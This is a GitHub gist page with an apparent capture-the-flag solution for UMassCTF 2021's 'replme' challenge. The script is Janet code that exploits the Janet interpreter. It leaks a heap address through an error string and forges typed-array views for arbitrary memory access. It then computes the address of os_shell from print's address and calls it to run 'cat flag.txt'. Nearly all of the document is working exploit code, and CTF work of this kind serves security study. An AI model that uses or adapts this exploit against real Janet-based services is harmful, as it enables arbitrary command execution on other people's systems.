-
-
Save rick2600/f92999a06dd4bf45832ba4633f6a6e87 to your computer and use it in GitHub Desktop.
UMassCTF 2021 - replme
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# CTF: UMassCTF 21 | |
# Challenge: replme | |
# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085 | |
# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip | |
(defn hex2n [x] | |
(var res 0) | |
(def reversed (reverse x)) | |
(var c 0) | |
(for i 0 (length reversed) | |
(var v (get reversed i)) | |
(if (>= v 65) | |
(set v (+ (- v 65) 10)) | |
(set v (- v 48)) | |
) | |
(+= res (+ (blshift v c))) | |
(+= c 4) | |
) | |
res | |
) | |
(defn leak [param] | |
(var leaked @{}) | |
(try | |
(do | |
(param) | |
) | |
([err] | |
(print "Leaked array address: " (string/slice err 7 21)) | |
(put leaked :hi (hex2n (string/slice err 9 13))) | |
(put leaked :lo (hex2n (string/slice err 13 21))) | |
) | |
) | |
leaked | |
) | |
(var array @[print]) | |
(var leaked (leak array)) | |
(var buffer (tarray/buffer 8)) | |
(var buffer_float64_view (tarray/new :float64 1 1 0 buffer)) | |
(var buffer_uint32_view (tarray/new :uint32 2 1 0 buffer)) | |
(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi))) | |
(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18)) | |
# used to leak print (cfun_io_print) address | |
(var fake_buffer_uint32_view (tarray/new :uint32 10 1 0 (buffer_float64_view 0))) | |
# cfun_io_print + 0x3fd0 = &os_shell | |
(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1)) | |
(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0)) | |
((buffer_float64_view 0) "cat flag.txt") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment